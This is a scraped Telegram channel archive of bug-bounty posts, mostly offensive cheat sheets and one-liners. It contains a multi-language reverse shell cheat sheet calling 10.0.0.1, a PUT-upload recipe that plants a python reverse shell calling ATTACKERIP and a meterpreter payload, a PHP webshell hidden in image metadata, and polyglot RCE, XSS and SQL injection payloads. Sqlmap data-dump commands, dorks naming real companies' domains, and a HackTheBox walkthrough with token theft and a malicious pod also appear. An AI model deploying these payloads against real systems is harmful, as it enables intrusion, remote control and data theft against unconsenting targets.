Bug bounty Tips

Открыть в Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Больше

Индия57 284 Технологии и приложения17 315

5 853

Подписчики

+1124 часа

+687 дней

+37430 день

489

Просмотры поста

~ 25224 часа

~ 35748 часов

8.36%

Коэффициент вовлеченности

~ 3

Постов в день

Ads index

beta

Архив постов

5 855

Hydra - Brute Force Password .pdf2.37 MB

5 855

My own discussion channel do join https://t.me/bug_hunting_talks

5 855

400 followers for today ❤️❤️🥳🥳🥳

5 855

🚀🤌Bug Bounty Tips!!!🔥🔥 Quick tricks `bash # Web ports for nmap 80,81,300,443,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8083,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,10000,11371,12443,16080,18091,18092,20720,55672 # Technology scanner # github.com/urbanadventure… whatweb htttps://url.com # Screenshot web # github.com/maaaaz/webscre… # github.com/sensepost/gowi… # github.com/michenriksen/a… # Get error with in input %E2%A0%80%0A%E2%A0%80 # Retrieve additional info: /favicon.ico/..%2f /lol.png%23 /../../../ ?debug=1 /server-status /files/..%2f..%2f # Change default header to accept */* Accept: application/json, text/javascript, */*; q=0.01 # Sitemap to wordlist (httpie) http target.com/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' > wordlist_endpoints.txt # Bypass Rate Limits: # Use different params: sign-up, Sign-up, SignUp # Null byte on params: %00, %0d%0a, %09, %0C, %20, %0 # Bypass upload restrictions: # Change extension: .pHp3 or pHp3.jpg # Modify mimetype: Content-type: image/jpeg # Bypass getimagesize(): exiftool -Comment='"; system($_GET['cmd']); ?>' file.jpg # Add gif header: GIF89a; # All at the same time. # ImageTragic (memory leaks in gif preview) # github.com/neex/gifoeb ./gifoeb gen 512x512 dump.gif # Upload dump.gif multiple times, check if preview changes. # Check docs for exploiting # If upload from web is allowed or : # medium.com/@shahjerry33/p… # iplogger.org/invisible/ # iplogger.org/15bZ87 # Check HTTP options: # Check if it is possible to upload curl -v -k -X OPTIONS https://10.11.1.111/ # If put enabled, upload: curl -v -X PUT -d '' http://10.11.1.111/test/shell.php nmap -p 80 192.168.1.124 --script http-put --script-args http-put.url='/test/rootme.php',http-put.file='/root/php-reverse-shell.php' curl -v -X PUT -d '' http://VICTIMIP/test/cmd.php && http://VICTIMIP/test/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22ATTACKERIP%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://VICTIMIP:8585/uploads/meterpreter.php # If PUT is not allowed, try to override: X-HTTP-Method-Override: PUT X-Method-Override: PUT # Retrieve endpoints # LinkFinder # github.com/GerbenJavado/L… python linkfinder.py -i example.com -d python linkfinder.py -i burpfile -b # Retreive hidden parameters # Tools # github.com/s0md3v/Arjun python3 arjun.py -u url.com --get python3 arjun.py -u url.com --post # github.com/maK-/parameth python parameth.py -u example.com/test.php # github.com/devanshbatham/… python3 paramspider.py --domain example.com # github.com/s0md3v/Parth python3 parth.py -t example.com # .DS_Store files? # github.com/gehaxelt/Pytho… python main.py samples/.DS_Store.ctf # Polyglot RCE payload 1;sleep${IFS}9;#${IFS}’;sleep${IFS}9;#${IFS}”;sleep${IFS}9;#${IFS} # Nmap web scan nmap --script "http-*" example.com -p 443 # SQLi + XSS + SSTI '"><svg/onload=prompt(5);>{{7*7}} ' ==> for Sql injection "><svg/onload=prompt(5);> ==> for XSS {{7*7}} ==> for SSTI/CSTI # Try to connect with netcat to port 80 nc -v host 80 # Understand URL params with unfurl dfir.blog/unfurl/

5 855

Penetration Testing Cheatsheet 🔥🔥 Share and Support US: https://t.me/bugbounty_tech

5 855

Spot the difference

5 855

Bug Bounty Tips!!! 😎😎😎👌👌👌👌 SSRF on Steroids 🔥🔥☄️☄️☄️☄️☄️ Methodology Step 1: Subdomain Enumeration •DNS Dumpster •Sublist3r •Amass •Google Dorking •Certificate Transparency Logs •subdomainer Step 2: Find Live Domains cat all-domains.txt | httpx > all-live.txt Step 3: Identify All URLs cat all-live.txt | gauplus -subs -b png,jpg,gif,jpeg,swf,woff,gif,svg -o allUrls.txt Step 4: Injection Burp Collaborator URL in Parameters cat /home/casperino/tools/nuclei/httpx.txt | grep "=" | ./qsreplace 40ga7gynfy6pcg06ov.oastify.com > ssrf.txt Step 5: Test for SSRF Vulnerabilities cat ssrf.txt | httpx -fr Step 6: How to check which URL is vulnerable split -l 10 ssrf.txt output_file_

5 855

Bug Bounty Tips: Finding additional targets connected to your widescope target. Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.? Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag. Here's how to access this valuable data: 1️⃣ You must login to builtwith.com 2️⃣ Visit builtwith.com/relationships/… You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets. #BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️

5 855

https://github.com/fr0gger/Awesome-GPT-Agents

5 855

5 855

5 855

Reverse Shell Cheat Sheet Bash; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 Python; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PERL; perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' PHP; php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby; ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' Netcat; nc -e /bin/sh 10.0.0.1 1234 Java; r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() xterm; xterm -display 10.0.0.1:1

5 855

Here's a neatly rewritten summary of my CTF notes on steamcloud hackthebox: Target System: Kubernetes API on 10.10.11.133 Port 8443 Analysis: - Found various DNS and IP entries indicating Kubernetes services. Tools Installation:

- Installed `kubectl` for Kubernetes interaction. [Installation Guide](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/)

- Installed kubeletctl for kubelet interaction. GitHub Link Commands and Explorations: 1.Kubernetes Cluster Info:

   kubectl --server https://10.10.11.133:8443 get pod/namespaces/cluster-info

2.Running Pods Enumeration with kubeletctl:

   kubeletctl runningpods -s 10.10.11.133 | jq -c '.items[].metadata | [.names, .namespace]'

- Found running pods in kube-system and nginx. 3.Executing Commands in Pod:

   kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx

- This retrieves the user identity information from the nginx pod. 4.Extracting User Text File:

   kubeletctl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx

- Retrieved user.txt content: 5327f7xxxxxxxxxxxxxxxxxxxx. 5.Shell Access Preparation: - Used base64 encoding for bash reverse shell command:

     echo "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" | base64 -w0

- Alternatively, direct command execution for shell access:

     kubeletctl -s 10.10.11.133 exec "/bin/bash" -p nginx -c nginx

6.Exploring Kubernetes Service Account: - Checked /run/secrets/kubernetes.io/serviceaccount for CA certificate, namespace, and service token. 7.Token Extraction and Permissions Check:

   export token=$(kubeletctl -s 10.10.11.133 exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx)
   kubectl auth can-i --list --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

8.Creating and Deploying Malicious Pod: - Created a YAML file for a new pod with root access. - Deployed the pod using:

     kubectl apply -f evil-pod.yaml --server https://10.10.11.133:8443 --certificate-authority=ca.crt --token=$token

9.Root Flag Retrieval:

   kubeletctl exec "cat /root/root/root.txt" -s 10.10.11.133 -p nginxt -c nginxt

- Root flag: fabcaxxxxxxxxxxxxxxxxxxxx

5 855

check out the notes here below

5 855

5 855

go install github.com/Tanmay-N/CORS-Scanner@latest cat CORS-domain.txt | CORS-Scanner ____________________ ## Nmap Scanning :- #- nmap -sS -p- 192.168.1.4 (-sS) Avoid Firewell && Connection Log. #- nmap -sS -p- -iL hosts.txt #- nmap -Pn -sS -A -sV -sC -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -iL liveips.txt -oN scan-result.txt #- nmap -Pn -A -sV -sC 67.20.129.216 -p 17,80,20,21,22,23,24,25,53,69,80,123,443,1723,4343,8081,8082,8088,53,161,177,3306,8888,27017,27018,139,137,445,8080,8443 -oN scan-result.txt --script=vuln #- nmap -sT -p- 192.168.1.4 (Full Scan (TCP)). #- nmap -sT -p- 192.168.1.5 --script=banner (Services Fingerprinting). #- nmap -sV 192.168.1.4 (Services Fingerprinting). #- nmap 192.168.1.5 -O (OS Fingerprinting). #- nmap 192.168.1.0-255 -sn (-sn) Live Hosts with me in network. #- nmap -iL hosts.txt -sn #- nc -nvz 192.168.1.4 1-65535 (Port Scanning Using nc). #- nc -vn 34.66.209.2 22 (Services Fingerprinting). #- netdiscover (Devices On Network) (Layer2). #- netdiscover -r 192.168.2.0/24 (Range). #- netdiscover -p (Passive). #- netdiscover -l hosts.txt ______________________ ## Running Nuclei :- Scanning target domain with community-curated nuclei templates :- - nuclei -u https://example.com - nuclei -list urls.txt -t /fuzzing-templates - nuclei -list live-subs.txt -t /root/nuclei-templates/vulnerabilities -t /root/nuclei-templates/cves -t /root/nuclei-templates/exposures -t /root/nuclei-templates/sqli.yaml - nuclei -u https://example.com -w workflows/ ______________________ ## Open Redirect:- Open Redirection OneLiner :- - waybackurls tesorion.nl | grep -a -i \=http | qsreplace 'evil.com' | while read host do;do curl -s -L $host -I| grep "evil.com" && echo "$host \033[0;31mVulnerable\n" ;done - httpx -l i.txt -path "///evil.com" -status-code -mc 302 _________________ ## Resources And Tools :- https://github.com/orwagodfather/x https://github.com/SAPT01/HBSQLI python3 hbsqli.py -l y.txt -p payloads.txt -H headers.txt -v python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v https://github.com/thecybertix/One-Liner-Collections https://github.com/projectdiscovery/fuzzing-templates https://github.com/0xKayala/NucleiFuzzer https://wpscan.com/vulnerability/825eccf9-f351-4a5b-b238-9969141b94fa _________________ ####### 📌 Complete Bug Bounty tool List 📌 dnscan https://github.com/rbsec/dnscan Knockpy https://github.com/guelfoweb/knock Sublist3r https://github.com/aboul3la/Sublist3r massdns https://github.com/blechschmidt/massdns nmap https://nmap.org masscan https://github.com/robertdavidgraham/masscan EyeWitness https://github.com/ChrisTruncer/EyeWitness DirBuster https://sourceforge.net/projects/dirbuster/ dirsearch https://github.com/maurosoria/dirsearch Gitrob https://github.com/michenriksen/gitrob git-secrets https://github.com/awslabs/git-secrets sandcastle https://github.com/yasinS/sandcastle bucket_finder https://digi.ninja/projects/bucket_finder.php GoogD0rker https://github.com/ZephrFish/GoogD0rker/ Wayback Machine https://web.archive.org waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050 Sn1per https://github.com/1N3/Sn1per/ XRay https://github.com/evilsocket/xray wfuzz https://github.com/xmendez/wfuzz/ patator https://github.com/lanjelot/patator datasploit https://github.com/DataSploit/datasploit hydra https://github.com/vanhauser-thc/thc-hydra changeme https://github.com/ztgrace/changeme

5 855

## Check-list :- Manual Hunting inside websites for :- 1- CSRF 2- IDORS 3- Bussiness Logic Vulnerbilities 4- API bugs 5- SQLi 6- XSS ______________________ ## XSS :- - Paramspider :- - python3 paramspider.py --domain indrive.com - python3 paramspider.py --domain https://cpcalendars.cartscity.com --exclude woff,css,js,png,svg,php,jpg --output g.txt - cat indrive.txt | kxss ( looking for reflected :- "<> ) ## Looking for Hidden parameters :- - Arjun :- - arjun -u https://44.75.33.22wms/wms.login -w burp-parameter-names.txt - waybackurls youneedabudget.com | gf xss | grep '=' | qsreplace '"><script>confirm(1)</script>' | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "<script>confirm(1)" && echo "$host \033[0;31mVulnerable\n";done - dalfox url https://access.epam.com/auth/realms/plusx/protocol/openid-connect/auth?response_type=code -b https://hahwul.xss.ht - dalfox file urls.txt -b https://hahwul.xss.ht - echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100 - cat urls.txt | Gxss -c 100 -p XssReflected ______________________ ## Sql Injection :- - echo https://www.recreation.gov | waybackurls | grep "\?" | uro | httpx -silent > param.txt - cat subdomains.txt | waybackurls | grep "\?" | uro | httpx -silent > param.txt - sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt - sqlmap -u https://my.easyname.at/en/login --dbs --forms --crawl=2 ## SQLi One Linear :- - cat target.com | waybackurls | grep "\?" | uro | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt - subfinder -dL domains.txt | dnsx | waybackurls | uro | grep "\?" | head -20 | httpx -silent > urls;sqlmap -m urls --batch --random-agent --level 1 | tee sqlmap.txt ## Dump-Data :- - sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dbs (Databases) - sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --tables -D acuart (Dump DB tables ) - sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --columns -T users (Dump Table Columns ) - sqlmap -u http://testphp.vulnweb.com/AJAX/infocateg.php?id=1 --dump -D acuart -T users ______________________ ## SSTI :- FOR Testing SSTI and tplmap tool :- - git clone https://github.com/epinna/tplmap.git - ./tplmap.py -u "domain.com/?parameter=SSTI*" ______________________ - httpx -l live_subs.txt --status-code --title -mc 200 -path /phpinfo.php - httpx -l live_subs.txt --status-code --title -mc 200 -path /composer.json ______________________ ######## Testing for xss and sqli at the same time >_< ############## - cat subdomains.txt | waybackurls | uro | grep "\?" | httpx -silent > param.txt - sqlmap -m param.txt --batch --random-agent --level 1 | tee sqlmap.txt - cat param.txt | kxss ______________________ ## Blind SQL Injection :- Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z ## Blind XSS :- site:opsgenie.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contcat_us" | inurl:"contact_form" | inurl:"contact-form" ## Go to xss.report website and create an account to test for blind xss Vulnerbilitites ______________________ ## Hunting For Cors Misconfigration :- https://github.com/chenjj/CORScanner pip install corscanner corscanner -i live_subdomains.txt -v -t 100 ____________________ https://github.com/Tanmay-N/CORS-Scanner

5 855

My methodology ## Recon :- - subfinder subfinder -dL domains.txt -o subfinder.txt subfinder -d inholland.nl -o subfinder.txt - amass go install -v github.com/OWASP/Amass/v3/...@master amass enum -passive -norecursive -noalts -df domains.txt -o amass.txt - crtfinder python3 crtfinder.py -u alloyhome.com - sublist3r sublist3r -d safesavings.com -o sublist3r.txt - site:*.ibm.com -site:www.ibm.com - # Merging subdomains into one file :- all-subs.txt cat amass.txt subfinder.txt gobuster_subs.txt other.txt | anew all-subs.txt - cat all-subs.txt | httpx -o live-subs.txt - cat live-subs.txt | dirsearch --stdin - also ffuf :- ffuf -u https://www.workramp.com/FUZZ -w wordlist.txt -mc 200,403,301,302 -c true -v -o output.txt ---------------------------------------------------------------------------------------------- ## Subdomain Takeover :- 1- Recon (live-subs.txt) 2- Testing :- 1- Nuclei :- - nuclei -t /root/nuclei-templates/takeovers/ -l live-subs.txt 2- Subzy :- https://github.com/LukaSikic/subzy - subzy run --targets live-subs.txt - subzy run --target test.google.com - subzy run --target test.google.com,https://test.yahoo.com ______________________ ## virtual Host scanner :- - git clone https://github.com/jobertabma/virtual-host-discovery.git - ruby scan.rb --ip=151.101.194.133 --host=cisco.com ______________________ ## JS Hunting :- 1- echo target.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript'" | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt 2- echo uber.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript' 3- JSS-Scanner :- - echo "invisionapp.com" | waybackurls | grep -iE '\.js'|grep -ivE '\.json'|sort -u > j.txt - python3 JSScanner.py ______________________ ## Shodan Dorking :- - ssl.cert.subject.CN:"gevme.com*" 200 - ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21" - ssl.cert.subject.CN:"*.target.com"+200 http.title:"Admin" - Set-Cookie:"mongo-express=" "200 OK" - ssl:"invisionapp.com" http.title:"index of / " - ssl:"arubanetworks.com" 200 http.title:"dashboard" - net:192.168.43/24, 192.168.40/24 - AEM Login panel :- git clone https://github.com/0ang3el/aem-hacker.git User:anonymous Pass:anonymous ## Collect all interisting ips from Shodan and save them in ips.txt - cat ips.txt | httpx > live-ips.txt - cat live_ips.txt | dirsearch --stdin ______________________ ## Google dorking :- - site:*.gapinc.com inurl:”*admin | login” | inurl:.php | .asp - intext:"index of /.git" - site:*.*.edu intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()" - site:*.mil link:www.facebook.com | link:www.instagram.com | link:www.twitter.com | link:www.youtube.com | link:www.telegram.com | link:www.hackerone.com | link:www.slack.com | link:www.github.com - inurl:/geoserver/web/ (intext:2.21.4 | intext:2.22.2) - inurl:/geoserver/ows?service=wfs ______________________ ## Github Dorking on live-subs.txt :- - git-Grabber :- - python3 gitGraber.py -k wordlists/keywords.txt -q "yahoo" -s - python3 gitGraber.py -k wordlists/keywords.txt -q \"yahoo.com\" -s - python3 gitGraber.py -k keywordsfile.txt -q \"yahoo.com\" -s -w mywordlist.txt - GitHound ______________________

5 855

✅ 500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources ✅ 🟡Data science 🟡Python 🟡Artificial Intelligence 🟡AWS Certified 🟡Cloud 🟡BIG DATA 🟡Data Analytics 🟡BI 🟡Google Cloud Platform 🟡IT Training 🟡MBA 🟡Machine Learning 🟡Deep Learning 🟡Ethical Hacking 🟡SPSS 🟡Statistics 🟡Data Base 🟡Learning language resources ( English🌍 , French🇫🇷 , German🇩🇪 ) 🔗https://drive.google.com/drive/mobile/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD 📨 Join https://t.me/bugbounty_tech